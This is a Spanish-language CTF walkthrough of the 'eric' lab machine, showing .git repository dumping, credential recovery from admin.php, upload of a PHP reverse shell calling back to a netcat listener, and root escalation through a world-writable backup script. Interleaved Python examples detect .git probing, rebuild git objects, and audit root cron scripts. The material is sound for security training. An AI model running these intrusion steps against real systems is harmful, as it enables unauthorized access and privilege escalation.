SP: eric GitTools - danielcastropalomares/security GitHub Wiki
We start with an initial port scan:
root@kali:~# nmap -p- 172.31.255.102
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-02 20:11 CEST
Nmap scan report for pinkys-palace (172.31.255.102)
Host is up (0.000096s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:05:BC:25 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.95 seconds
root@kali:~# nmap -A 172.31.255.102
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-05-02 20:11 CEST
Nmap scan report for pinkys-palace (172.31.255.102)
Host is up (0.00058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-git:
| 172.31.255.102:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: minor changes
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Blog under construction
MAC Address: 08:00:27:05:BC:25 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms pinkys-palace (172.31.255.102)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds
We find a web server and an SSH server. Running nikto against the web server reveals an admin.php and a .git directory:
root@kali:~# nikto -host 172.31.255.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.102
+ Target Hostname: 172.31.255.102
+ Target Port: 80
+ Start Time: 2019-05-02 20:13:17 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7535 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2019-05-02 20:13:29 (GMT2) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.29) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
We explore the git directory:
root@kali:~# curl http://172.31.255.102/.git/HEAD
ref: refs/heads/master
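The requests above (nmap's http-git script, nikto's probes for .git/index, .git/HEAD and .git/config, and the manual curl) all leave entries in the web server's access log. As an added example, not part of the original write-up, the following Python script parses Apache combined-format log lines and flags any request for VCS metadata, distinguishing requests that were actually served (status 2xx, i.e. the repository is leaking) from those that were blocked. The log lines, IPs and timestamps are constructed sample data modelled on what such a scan leaves behind.

```python
"""Flag requests for exposed VCS metadata (.git, .svn, ...) in Apache access logs.

Added example, not from the original write-up. SAMPLE_LOG is constructed:
the IPs, timestamps and user agents are sample values, not real captures.
"""
import re

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# paths that reveal version-control metadata
VCS_RE = re.compile(r"/\.(git|svn|hg|bzr)(/|$)")

SAMPLE_LOG = """\
172.31.255.129 - - [02/May/2019:20:11:40 +0200] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
172.31.255.129 - - [02/May/2019:20:13:18 +0200] "GET /admin.php HTTP/1.1" 200 1345 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
172.31.255.129 - - [02/May/2019:20:13:20 +0200] "GET /.git/index HTTP/1.1" 200 417 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001234)"
172.31.255.129 - - [02/May/2019:20:13:21 +0200] "GET /.git/config HTTP/1.1" 200 92 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001235)"
10.0.0.7 - - [02/May/2019:20:20:01 +0200] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [02/May/2019:20:20:05 +0200] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_vcs_requests(log_text):
    """Return the parsed entries that requested VCS metadata.

    Each entry gets a 'served' flag: True when the server answered 2xx,
    meaning the repository content really was handed out.
    """
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and VCS_RE.search(entry["path"]):
            entry["served"] = entry["status"].startswith("2")
            hits.append(entry)
    return hits


def summarize(hits):
    """Per-source counts of served (leaking) versus blocked VCS requests."""
    summary = {}
    for h in hits:
        s = summary.setdefault(h["ip"], {"served": 0, "blocked": 0})
        s["served" if h["served"] else "blocked"] += 1
    return summary


if __name__ == "__main__":
    for ip, counts in summarize(find_vcs_requests(SAMPLE_LOG)).items():
        print(ip, counts)
```

Any source with a non-zero "served" count got real repository data, so the fix on the server side is to deny access to the directory (in Apache 2.4, a DirectoryMatch on \.git with Require all denied, or a RedirectMatch to 404) and, better, not to deploy the .git directory under the document root at all. The curl against .git/HEAD shown above is the quickest way to confirm the fix took effect.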
We create a temporary directory to dump the .git directory into:
root@kali:/usr/local/src/Osmedeus# mkdir /tmp/dumper
With the GitTools Dumper we dump the repository:
git clone https://github.com/internetwache/GitTools.git
root@kali:/usr/local/src/GitTools/Dumper# ./gitdumper.sh http://172.31.255.102/.git/ /tmp/dumper
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/3d/b5628b550f5c9c9f6f663cd158374035a6eaa0
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/cc/1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Downloaded: objects/a8/9a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Downloaded: objects/31/33d44be3eebe6c6761b50c6fdf5b7fb664c2d8
[+] Downloaded: objects/3d/8e9ce9093fc391845dd69b0436b258ac4a6387
[+] Downloaded: objects/f0/d95f54335626ce6c96522e0a9105780b3366c5
[+] Downloaded: objects/c0/951efcb330fc310911d714acf03b873aa9ab43
[+] Downloaded: objects/23/448969d5b347f8e91f8017b4d8ef6edf6161d8
[+] Downloaded: objects/e7/ba67226cda1ecc1bd3a2537f0be94343d448bb
With the Extractor from the same toolkit we restore the files:
root@kali:/usr/local/src/GitTools/Extractor# ./extractor.sh /tmp/dumper /tmp/extractor
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: 3db5628b550f5c9c9f6f663cd158374035a6eaa0
[+] Found file: /tmp/extractor/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/admin.php
[+] Found file: /tmp/extractor/0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/index.php
[+] Found commit: a89a716b3c21d8f9fee38a0693afb22c75f1d31c
[+] Found file: /tmp/extractor/1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/admin.php
[+] Found file: /tmp/extractor/1-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/index.php
[+] Found commit: cc1ab96950f56d1fff0d1f006821cab6b6b0e249
[+] Found file: /tmp/extractor/2-cc1ab96950f56d1fff0d1f006821cab6b6b0e249/index.php
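What extractor.sh does with the dumped objects is worth understanding, because it is the reason an exposed .git directory leaks the complete source, including every earlier revision. Each loose object under .git/objects is a zlib-compressed blob with a "<type> <size>\0" header; a commit names a tree, a tree names blobs (files) and sub-trees, and following those links rebuilds the working copy. The following Python script, an added example that is neither the write-up's nor GitTools' code, builds a tiny one-commit object store in a temporary directory from constructed content (the file names mirror the admin.php and index.php recovered above, the secret inside is a labelled placeholder) and then recovers the files from the commit in the same way.

```python
"""Walk a git object store the way GitTools' extractor does: commit -> tree -> blobs.

Added example, not part of the original write-up or of GitTools. It constructs a
minimal .git/objects store in a temp directory and recovers the files of its commit.
"""
import hashlib
import os
import tempfile
import zlib


def write_object(git_dir, obj_type, content):
    """Store content as a loose object (zlib-compressed, header-prefixed); return its hex SHA-1."""
    raw = f"{obj_type} {len(content)}\0".encode() + content
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    """Inflate a loose object and split off its '<type> <size>\\0' header."""
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    with open(path, "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {sha}")
    return obj_type, body


def parse_tree(body):
    """Yield (mode, name, hex_sha) from the binary entries of a tree object."""
    pos = 0
    while pos < len(body):
        nul = body.index(b"\0", pos)
        mode, name = body[pos:nul].decode().split(" ", 1)
        sha = body[nul + 1:nul + 21].hex()   # 20 raw bytes follow the NUL
        pos = nul + 21
        yield mode, name, sha


def recover_files(git_dir, commit_sha, out_dir):
    """Write the files of one commit into out_dir; return {relative path: content}."""
    obj_type, body = read_object(git_dir, commit_sha)
    if obj_type != "commit":
        raise ValueError(f"{commit_sha} is a {obj_type}, not a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()  # "tree <sha>" line
    recovered = {}

    def walk(tree_sha, prefix):
        _, tree_body = read_object(git_dir, tree_sha)
        for mode, name, sha in parse_tree(tree_body):
            rel = os.path.join(prefix, name)
            if mode == "40000":            # sub-directory
                walk(sha, rel)
            else:                          # regular file (100644 / 100755)
                _, blob = read_object(git_dir, sha)
                dest = os.path.join(out_dir, rel)
                os.makedirs(os.path.dirname(dest), exist_ok=True)
                with open(dest, "wb") as f:
                    f.write(blob)
                recovered[rel] = blob

    walk(tree_sha, "")
    return recovered


def build_sample_repo(git_dir):
    """Construct a one-commit repository; the secret is a labelled placeholder."""
    index_sha = write_object(git_dir, "blob", b"<?php echo 'Blog under construction';\n")
    admin_sha = write_object(git_dir, "blob", b"<?php $password = 'CONSTRUCTED-SAMPLE-SECRET';\n")
    tree = b""
    for name, sha in sorted([("admin.php", admin_sha), ("index.php", index_sha)]):
        tree += b"100644 " + name.encode() + b"\0" + bytes.fromhex(sha)
    tree_sha = write_object(git_dir, "tree", tree)
    commit = (f"tree {tree_sha}\n"
              "author Example <example@example.invalid> 0 +0000\n"
              "committer Example <example@example.invalid> 0 +0000\n"
              "\nminor changes\n").encode()
    return write_object(git_dir, "commit", commit)


def demo():
    """Build the sample repository, recover it, and return the recovered files."""
    base = tempfile.mkdtemp()
    git_dir = os.path.join(base, ".git")
    commit_sha = build_sample_repo(git_dir)
    return recover_files(git_dir, commit_sha, os.path.join(base, "extracted"))


if __name__ == "__main__":
    for path, content in demo().items():
        print(path, "->", content.decode().strip())
```

Because the parent-commit links in each commit object lead to older trees, the same walk over every commit recovers every historical revision, which is why removing a credential in a later commit does not help once .git is reachable.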
In the most recent commit we find the credentials in the admin.php file:
root@kali:/tmp/extractor# cat 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/admin.php | more
<?php
ob_start();
session_start();
if ($_POST['submit']) {
    if ($_POST['username'] == 'admin' && $_POST['password'] == '[email protected]$glo0mappL3') {
        $_SESSION['auth'] = 1;
    } else {
        exit("Wrong username and/or password. Don't even bother bruteforcing.");
    }
}
// (remaining output cut off by more)
admin: [email protected]$glo0mappL3
We go back to admin.php via the web and log in with those credentials. We now find a file upload form:
We are going to upload a reverse shell:
root@kali:/tmp# wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
root@kali:/tmp# tar -xvzf php-reverse-shell-1.0.tar.gz
Inside the PHP file we set the IP of our Kali machine and an arbitrary port:
root@kali:/tmp/php-reverse-shell-1.0# vi php-reverse-shell.php
We open a netcat listener on our Kali:
root@kali:/tmp/extractor# nc -vlp 9988
listening on [any] 9988 ...
Now we browse to the uploads directory and open the shell we uploaded:
And we see our shell open in netcat:
root@kali:/tmp/extractor# nc -vlp 9988
listening on [any] 9988 ...
connect to [172.31.255.129] from pinkys-palace [172.31.255.102] 52678
Linux eric 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
20:45:40 up 1:00, 0 users, load average: 0.00, 0.03, 0.84
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
In the crontab we find no scheduled script:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
In the cron.d directory we find nothing either:
$ ls -liath /etc/cron.d
total 20K
128513 drwxr-xr-x 81 root root 4.0K Oct 28 2018 ..
129431 drwxr-xr-x 2 root root 4.0K Oct 28 2018 .
130883 -rw-r--r-- 1 root root 190 Oct 21 2018 popularity-contest
160634 -rw-r--r-- 1 root root 712 Jan 18 2018 php
129432 -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
We spawn a proper shell with python:
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@eric:/$
We look for processes running as root:
$ ps aux | grep root
root 1 0.0 0.8 159304 8700 ? Ss 19:44 0:01 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 19:44 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 19:44 0:00 [kworker/0:0H]
root 5 0.0 0.0 0 0 ? I 19:44 0:00 [kworker/u2:0]
root 6 0.0 0.0 0 0 ? I< 19:44 0:00 [mm_percpu_wq]
root 7 0.1 0.0 0 0 ? S 19:44 0:04 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 19:44 0:00 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 19:44 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 19:44 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 19:44 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 19:44 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 19:44 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 19:44 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 19:44 0:00 [rcu_tasks_kthre]
root 16 0.0 0.0 0 0 ? S 19:44 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 19:44 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 19:44 0:00 [oom_reaper]
root 19 0.0 0.0 0 0 ? I< 19:44 0:00 [writeback]
root 20 0.0 0.0 0 0 ? S 19:44 0:00 [kcompactd0]
root 21 0.0 0.0 0 0 ? SN 19:44 0:00 [ksmd]
root 22 0.0 0.0 0 0 ? SN 19:44 0:00 [khugepaged]
root 23 0.0 0.0 0 0 ? I< 19:44 0:00 [crypto]
root 24 0.0 0.0 0 0 ? I< 19:44 0:00 [kintegrityd]
root 25 0.0 0.0 0 0 ? I< 19:44 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? I< 19:44 0:00 [ata_sff]
root 27 0.0 0.0 0 0 ? I< 19:44 0:00 [md]
root 28 0.0 0.0 0 0 ? I< 19:44 0:00 [edac-poller]
root 29 0.0 0.0 0 0 ? I< 19:44 0:00 [devfreq_wq]
root 30 0.0 0.0 0 0 ? I< 19:44 0:00 [watchdogd]
root 34 0.0 0.0 0 0 ? S 19:44 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? S 19:44 0:00 [ecryptfs-kthrea]
root 77 0.0 0.0 0 0 ? I< 19:44 0:00 [kthrotld]
root 78 0.0 0.0 0 0 ? I< 19:44 0:00 [acpi_thermal_pm]
root 79 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_0]
root 80 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_0]
root 81 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_1]
root 82 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_1]
root 85 0.0 0.0 0 0 ? I 19:44 0:01 [kworker/0:2]
root 89 0.0 0.0 0 0 ? I< 19:44 0:00 [ipv6_addrconf]
root 98 0.0 0.0 0 0 ? I< 19:44 0:00 [kstrp]
root 115 0.0 0.0 0 0 ? I< 19:44 0:00 [charger_manager]
root 161 0.0 0.0 0 0 ? I< 19:44 0:00 [kworker/0:1H]
root 162 0.0 0.0 0 0 ? S 19:44 0:00 [scsi_eh_2]
root 163 0.0 0.0 0 0 ? I< 19:44 0:00 [scsi_tmf_2]
root 184 0.0 0.0 0 0 ? S 19:44 0:00 [jbd2/sda1-8]
root 185 0.0 0.0 0 0 ? I< 19:44 0:00 [ext4-rsv-conver]
root 213 0.0 1.0 94788 10216 ? S<s 19:44 0:00 /lib/systemd/systemd-journald
root 241 0.0 0.5 46252 5196 ? Ss 19:44 0:00 /lib/systemd/systemd-udevd
root 316 0.0 0.0 0 0 ? I< 19:44 0:00 [iprt-VBoxWQueue]
root 322 0.0 0.0 0 0 ? I< 19:44 0:00 [ttm_swap]
root 340 0.0 1.7 170412 17552 ? Ssl 19:44 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 343 0.0 0.7 289840 7100 ? Ssl 19:44 0:00 /usr/lib/accountsservice/accounts-daemon
root 348 0.0 0.3 31320 3164 ? Ss 19:44 0:00 /usr/sbin/cron -f
root 349 0.0 0.5 62004 5576 ? Ss 19:44 0:00 /lib/systemd/systemd-logind
root 468 0.0 0.5 72296 5628 ? Ss 19:44 0:00 /usr/sbin/sshd -D
root 469 0.0 1.8 326624 18328 ? Ss 19:44 0:00 /usr/sbin/apache2 -k start
root 471 0.0 0.1 16180 1888 tty1 Ss+ 19:44 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1038 0.0 0.0 0 0 ? I 20:44 0:00 [kworker/u2:2]
root 1061 0.0 0.0 0 0 ? I 20:48 0:00 [kworker/0:1]
root 1065 0.0 0.0 0 0 ? I 20:49 0:00 [kworker/u2:1]
www-data 1084 0.0 0.1 11464 1104 ? S 20:54 0:00 grep root
We look for files with the SUID bit set:
www-data@eric:/$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/bin/umount
/bin/ntfs-3g
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/traceroute6.iputils
We find a script called backup.sh that is world-writable:
www-data@eric:/$ find / -perm -o=w -type f 2>/dev/null | grep -v proc
/home/eric/backup.sh
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
The script in question:
www-data@eric:/home/eric$ cat backup.sh
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html
In eric's home we find the first flag:
It seems the script above runs periodically, although I have not seen it in cron, since the timestamp of the .zip keeps changing:
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:06 .
7214 -rw-r--r-- 1 root root 26K May 2 21:06 backup.zip
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:12 .
7214 -rw-r--r-- 1 root root 26K May 2 21:12 backup.zip
www-data@eric:/home/eric$ ls -liath
total 68K
142 drwxr-xr-x 4 eric eric 4.0K May 2 21:15 .
33033 -rw-r--r-- 1 root root 26K May 2 21:15 backup.zip
And the resulting backup.zip is owned by root. We are going to take advantage of this and add the following to the backup script:
Now we wait a few minutes and we will see the file created:
www-data@eric:/home/eric$ cat /etc/sudoers.d/www-data
cat: /etc/sudoers.d/www-data: Permission denied
Now we get to root with sudo:
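The weakness the whole escalation rests on is a script executed by root (via cron or another scheduler) that an unprivileged user can edit. This is easy to audit for. The following Python script is an added example, not part of the original write-up: it parses system-crontab-style lines (the ones with a user field, as in /etc/crontab and /etc/cron.d), and for every job that runs as root checks the command's script for the conditions that would let someone else rewrite it (world- or group-writable, not owned by root, or sitting in a world-writable directory without the sticky bit). The crontab text and the backup.sh it points at are constructed inside a temporary directory; /home/eric/backup.sh is used only as the constructed job's command, and the root_dir parameter exists so the demo does not touch the real filesystem.

```python
"""Audit scripts run by root cron jobs for permissions that let other users edit them.

Added example, not from the original write-up. demo() constructs a crontab and a
world-writable backup.sh under a temp directory; nothing on the real system is read
unless audit_crontab() is called with root_dir left empty.
"""
import os
import re
import stat
import tempfile

# minute hour dom month dow user command   (system crontab layout)
CRON_LINE_RE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<command>.+)$")


def audit_script(path):
    """Return a list of findings describing who, besides root, could modify the script."""
    findings = []
    st = os.stat(path)
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append("group-writable by a non-root group")
    if st.st_uid != 0:
        findings.append(f"owned by uid {st.st_uid}, not root")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable without the sticky bit")
    return findings


def audit_crontab(crontab_text, root_dir=""):
    """Audit every job in crontab_text that runs as root.

    Returns {command path: findings}. root_dir is prefixed to each path so the
    example can point at constructed files; leave it empty for a real /etc/crontab.
    """
    results = {}
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if "=" in line.split()[0]:          # SHELL=..., PATH=... assignments
            continue
        m = CRON_LINE_RE.match(line)
        if not m or m.group("user") != "root":
            continue
        # the first token of the command is the script or binary actually executed
        target = m.group("command").split()[0]
        full = root_dir + target if root_dir else target
        if os.path.isfile(full):
            results[target] = audit_script(full)
    return results


def demo():
    """Construct the misconfiguration: a root cron job running a world-writable script."""
    base = tempfile.mkdtemp()
    script_dir = os.path.join(base, "home", "eric")
    os.makedirs(script_dir)
    script = os.path.join(script_dir, "backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nzip -r /home/eric/backup.zip /var/www/html\n")
    os.chmod(script, 0o777)   # anyone can edit what root will execute
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        "*/3 * * * * root /home/eric/backup.sh\n"   # constructed schedule
    )
    return audit_crontab(crontab, root_dir=base)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", ", ".join(findings) or "ok")
```

On a real host the same check should also cover jobs that cron does not show, such as systemd timers and scripts started from root's own crontab, since the write-up notes that backup.sh ran periodically without appearing in /etc/crontab or /etc/cron.d. The fix is the mirror image of the finding: the script must be owned by root with mode 0755 or stricter, in a directory root controls.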